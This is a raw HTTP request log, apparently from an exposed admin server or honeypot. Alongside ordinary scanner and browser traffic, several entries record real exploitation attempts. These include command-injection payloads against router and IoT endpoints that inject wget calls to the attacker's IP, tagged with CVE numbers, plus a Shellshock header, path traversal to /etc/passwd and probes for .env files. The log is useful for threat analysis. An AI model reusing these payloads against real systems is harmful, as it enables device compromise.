Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:53726
Path: /
URL: /
Method: GET
[2026-02-26 11:43:28] === HTTP Request ===
[2026-02-26 11:03:54] Main page accessed - IP: 104.199.46.221:41696
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 104.199.46.221:41696
Path: /
URL: /
Method: GET
[2026-02-26 11:03:54] === HTTP Request ===
[2026-02-26 10:43:04] Main page accessed - IP: 176.65.149.45:59256
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:59256
Path: /
URL: /
Method: GET
[2026-02-26 10:43:04] === HTTP Request ===
===================
Body: submit_button=index&action=Save&change_action=gozila_cgi&submit_type=adjust_sys_time&ntp_enable=1&time_zone=+08&daylight_time=1&ntp_server=my.pool.ntp.org&adjust_mode=Manual&adj_time_year=$(a%3Bwget+http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2024-12856+-O+%2Fdev%2Fnull%3Ba)&adj_time_mon=10&adj_time_day=27&adj_time_hour=11&adj_time_min=35&adj_time_sec=32
Connection: close
Authorization: Bearer Basic YWRtaW46YWRtaW...
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/1.0
Content-Length: 363
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:18816
Path: /apply.cgi
URL: /apply.cgi
Method: POST
[2026-02-26 10:23:08] === HTTP Request ===
[2026-02-26 10:21:13] Main page accessed - IP: 172.30.0.12:33154
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 149.154.161.219
Accept-Encoding: deflate, gzip, br
User-Agent: TelegramBot (like TwitterBot)
X-Forwarded-Proto: https
Via: 2.0 Caddy
Cookie: euConsent=true; BCPermissionLevel=PERSONAL; BC_GDPR=11111; fhCookieConsent=true; gdpr-source=GB; gdpr_consent=YES; beget=begetok; SOCS=CAISNQgEEitib3FfaWRlbnRpdHlmcm9udGVuZHVpc2VydmVyXzIwMjMwNzIzLjA5X3AwGgJlbiACGgYIgMSBpgY
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33154
Path: /
URL: /
Method: GET
[2026-02-26 10:21:13] === HTTP Request ===
[2026-02-26 10:21:13] Main page accessed - IP: 138.197.16.14:40528
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/70.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 138.197.16.14:40528
Path: /
URL: /
Method: GET
[2026-02-26 10:21:13] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Language: en-GB,en;q=0.9
X-Forwarded-For: 79.139.135.199
Priority: u=3, i
Accept-Encoding: gzip, deflate, br
Accept: */*
User-Agent: com.apple.WebKit.Networking/21623.1.14.11.9 Network/5569.60.39.0.3 macOS/26.2
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-26 10:20:46] === HTTP Request ===
===================
Via: 2.0 Caddy
X-Forwarded-Proto: https
Accept: */*
User-Agent: com.apple.WebKit.Networking/21623.1.14.11.9 Network/5569.60.39.0.3 macOS/26.2
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Priority: u=3, i
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /apple-touch-icon.png
URL: /apple-touch-icon.png
Method: GET
[2026-02-26 10:20:46] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
User-Agent: com.apple.WebKit.Networking/21623.1.14.11.9 Network/5569.60.39.0.3 macOS/26.2
Accept: */*
Via: 2.0 Caddy
Priority: u=3, i
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /apple-touch-icon-precomposed.png
URL: /apple-touch-icon-precomposed.png
Method: GET
[2026-02-26 10:20:46] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Priority: u=3
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Safari
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-26 10:20:45] === HTTP Request ===
===================
Via: 2.0 Caddy
Accept-Language: en-GB,en;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Safari
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Priority: u=3
Accept-Encoding: gzip, deflate, br
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /apple-touch-icon.png
URL: /apple-touch-icon.png
Method: GET
[2026-02-26 10:20:45] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Safari
X-Forwarded-Proto: https
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 79.139.135.199
Priority: u=3
Accept-Language: en-GB,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /apple-touch-icon-precomposed.png
URL: /apple-touch-icon-precomposed.png
Method: GET
[2026-02-26 10:20:44] === HTTP Request ===
[2026-02-26 10:20:44] Login page accessed - IP: 172.30.0.12:33150
===================
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Sec-Fetch-Mode: navigate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Accept-Language: en-GB,en;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Dest: document
Priority: u=0, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /login
URL: /login
Method: GET
[2026-02-26 10:20:44] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15
Accept-Encoding: gzip, deflate, br
Accept: */*
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/
Priority: u=3, i
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Dest: image
Accept-Language: en-GB,en;q=0.9
X-Forwarded-Proto: https
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33152
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-26 10:20:44] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Referer: https://admin.vulnberries.ru/
Priority: u=1, i
Accept-Language: en-GB,en;q=0.9
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-26 10:20:44] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/
Sec-Fetch-Dest: script
Priority: u=1, i
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Mode: no-cors
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-26 10:20:44] === HTTP Request ===
===================
Referer: https://admin.vulnberries.ru/
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
X-Forwarded-For: 79.139.135.199
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15
X-Forwarded-Proto: https
Sec-Fetch-Dest: style
Accept: text/css,*/*;q=0.1
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Priority: u=1, i
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-02-26 10:20:44] === HTTP Request ===
[2026-02-26 10:20:44] Main page accessed - IP: 172.30.0.12:33150
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.2 Safari/605.1.15
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Mode: navigate
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Sec-Fetch-Dest: document
Priority: u=0, i
X-Forwarded-Proto: https
X-Forwarded-For: 79.139.135.199
Sec-Fetch-Site: none
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33150
Path: /
URL: /
Method: GET
[2026-02-26 10:20:44] === HTTP Request ===
===================
Proxy-Connection: Keep-Alive
Pragma: no-cache
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Cache-Control: no-cache
Headers:
Protocol: HTTP/1.1
Host: www.shadowserver.org:443
RemoteAddr: 65.49.1.134:38187
Path:
URL: //www.shadowserver.org:443
Method: CONNECT
[2026-02-26 09:48:07] === HTTP Request ===
[2026-02-26 09:47:58] Main page accessed - IP: 65.49.1.133:60787
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: api.ipify.org
RemoteAddr: 65.49.1.133:60787
Query: format=json
Path: /
URL: http://api.ipify.org/?format=json
Method: GET
[2026-02-26 09:47:58] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.136:57927
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-26 09:47:23] === HTTP Request ===
[2026-02-26 09:46:36] Main page accessed - IP: 65.49.1.132:21188
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 65.49.1.132:21188
Path: /
URL: /
Method: GET
[2026-02-26 09:46:36] === HTTP Request ===
[2026-02-26 08:48:32] Main page accessed - IP: 54.183.100.114:51184
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 54.183.100.114:51184
Path: /
URL: /
Method: GET
[2026-02-26 08:48:32] === HTTP Request ===
[2026-02-26 08:47:48] Main page accessed - IP: 34.14.33.150:59730
===================
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.14.33.150:59730
Path: /
URL: /
Method: GET
[2026-02-26 08:47:48] === HTTP Request ===
===================
Body: submit-url=%2Fsyscmd.htm&sysCmd=a%3Bwget+http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2020-25499+-O+%2Fdev%2Fnull%3Ba
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/1.0
Content-Length: 123
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:57604
Path: /boafrm/formSysCmd
URL: /boafrm/formSysCmd
Method: POST
[2026-02-26 07:56:21] === HTTP Request ===
[2026-02-26 07:16:02] Main page accessed - IP: 198.235.24.38:51031
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.38:51031
Path: /
URL: /
Method: GET
[2026-02-26 07:16:02] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.47:62382
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-26 07:06:53] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 206.168.34.47:62378
Path: *
URL: *
Method: PRI
[2026-02-26 07:06:51] === HTTP Request ===
[2026-02-26 07:06:50] Main page accessed - IP: 206.168.34.47:62370
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.47:62370
Path: /
URL: /
Method: GET
[2026-02-26 07:06:50] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:54196
Path: /..\..\..\..\..\..\etc\passwd
URL: /..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
Method: GET
[2026-02-26 06:07:49] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.73:54184
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-02-26 06:07:49] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50020
Path: /settings.py
URL: /settings.py
Method: GET
[2026-02-26 06:00:36] === HTTP Request ===
===================
Accept: */*
User-Agent: curl/7.61.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.211:55145
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-26 05:43:55] === HTTP Request ===
[2026-02-26 05:43:55] Main page accessed - IP: 104.152.52.211:59679
===================
Accept: */*
User-Agent: curl/7.61.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.211:59679
Path: /
URL: /
Method: GET
[2026-02-26 05:43:55] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:59402
Query: deviceName=A;a%3Bwget%20http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2020-10987%20-O%20%2Fdev%2Fnull%3Ba
Path: /goform/setUsbUnload/.js
URL: /goform/setUsbUnload/.js?deviceName=A;a%3Bwget%20http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2020-10987%20-O%20%2Fdev%2Fnull%3Ba
Method: GET
[2026-02-26 05:05:22] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.3:48068
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-26 04:32:56] === HTTP Request ===
[2026-02-26 04:32:20] Main page accessed - IP: 85.217.140.3:48052
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.3:48052
Path: /
URL: /
Method: GET
[2026-02-26 04:32:20] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:46542
Path: /jars
URL: /jars
Method: GET
[2026-02-26 04:32:15] === HTTP Request ===
[2026-02-26 04:06:49] Main page accessed - IP: 205.210.31.244:61666
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.244:61666
Path: /
URL: /
Method: GET
[2026-02-26 04:06:49] === HTTP Request ===
===================
Body: ttcp_ip=-h+%60a%3Bwget+http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_tmUnblock+-O+%2Fdev%2Fnull%3Ba%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/1.0
Content-Length: 184
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:15592
Path: /tmUnblock.cgi
URL: /tmUnblock.cgi
Method: POST
[2026-02-26 02:16:07] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 64.89.160.111:4986
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-02-26 01:01:19] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.115.90.228:47090
Path: /manager/text/list
URL: /manager/text/list
Method: GET
[2026-02-26 00:05:46] === HTTP Request ===
===================
Body: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`a%3Bwget+http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2018-10562+-O+%2Fdev%2Fnull%3Ba`&ipv=0
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/1.0
Content-Length: 158
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:43352
Query: images/
Path: /GponForm/diag_Form
URL: /GponForm/diag_Form?images/
Method: POST
[2026-02-25 23:30:19] === HTTP Request ===
===================
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:54886
Path: /jars
URL: /jars
Method: GET
[2026-02-25 21:23:33] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/1.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:49704
Query: type=mod&parts=base_config&template=`a%3Bwget%20http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2024-7120%20-O%20%2Fdev%2Fnull%3Ba`
Path: /vpn/list_base_config.php
URL: /vpn/list_base_config.php?type=mod&parts=base_config&template=`a%3Bwget%20http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2024-7120%20-O%20%2Fdev%2Fnull%3Ba`
Method: GET
[2026-02-25 20:34:48] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.215:55530
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-02-25 20:13:12] === HTTP Request ===
===================
X-Openai-Host-Hash: 867116608
Via: 2.0 Caddy
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.26
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44486
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-25 17:25:46] === HTTP Request ===
[2026-02-25 16:57:34] Main page accessed - IP: 185.93.89.75:20892
===================
Connection: close
User-Agent: () { :; }; a;wget http://185.93.89.75/8081_JF0BED0BJB0DI_CVE-2014-6271 -O /dev/null;a
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:20892
Path: /
URL: /
Method: GET
[2026-02-25 16:57:34] === HTTP Request ===
[2026-02-25 14:52:31] Login page accessed - IP: 85.142.100.105:59894
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.105:59894
Path: /login
URL: /login
Method: GET
[2026-02-25 14:52:31] === HTTP Request ===
[2026-02-25 14:31:18] Main page accessed - IP: 20.169.105.0:44172
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.169.105.0:44172
Path: /
URL: /
Method: GET
[2026-02-25 14:31:18] === HTTP Request ===
===================
User-Agent: Mozilla/1.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:28872
Query: path=%7Ca%3Bwget%20http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2023-7311%20-O%20%2Fdev%2Fnull%3Ba
Path: /goform/webRead/open/
URL: /goform/webRead/open/?path=%7Ca%3Bwget%20http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2023-7311%20-O%20%2Fdev%2Fnull%3Ba
Method: GET
[2026-02-25 12:50:54] === HTTP Request ===
[2026-02-25 11:04:13] Main page accessed - IP: 207.90.244.22:42666
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.22:42666
Path: /
URL: /
Method: GET
[2026-02-25 11:04:13] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50006
Path: /.env.development
URL: /.env.development
Method: GET
[2026-02-25 10:50:19] === HTTP Request ===
[2026-02-25 09:47:47] Main page accessed - IP: 89.110.97.157:35810
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.110.97.157:35810
Path: /
URL: /
Method: GET
[2026-02-25 09:47:47] === HTTP Request ===
===================
User-Agent: Mozilla/1.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 185.93.89.75:50344
Query: command=busybox%20a%3Bwget%20http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2025-9528x2%20-O%20%2Fdev%2Fnull%3Ba
Path: /goform/SystemCommand
URL: /goform/SystemCommand?command=busybox%20a%3Bwget%20http%3A%2F%2F185.93.89.75%2F8081_JF0BED0BJB0DI_CVE-2025-9528x2%20-O%20%2Fdev%2Fnull%3Ba
Method: GET
[2026-02-25 09:47:20] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.218:22014
Path: /o8wz6d5lp3q_ge
URL: /o8wz6d5lp3q_ge
Method: GET
[2026-02-25 05:55:55] === HTTP Request ===
[2026-02-25 05:55:34] Login page accessed - IP: 162.142.125.218:43690
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.218:43690
Path: /login
URL: /login
Method: GET
[2026-02-25 05:55:34] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.218:6324
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-25 05:55:13] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 162.142.125.218:6314
Path: *
URL: *
Method: PRI
[2026-02-25 05:55:12] === HTTP Request ===
[2026-02-25 05:55:12] Main page accessed - IP: 162.142.125.218:6298
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.218:6298
Path: /
URL: /
Method: GET
[2026-02-25 05:55:12] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50003
Path: /.env.prod
URL: /.env.prod
Method: GET
[2026-02-25 05:36:30] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: example.com:443
RemoteAddr: 89.32.41.172:45766
Path:
URL: //example.com:443
Method: CONNECT
[2026-02-25 05:22:06] === HTTP Request ===
[2026-02-25 04:23:28] Main page accessed - IP: 198.235.24.110:65518
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
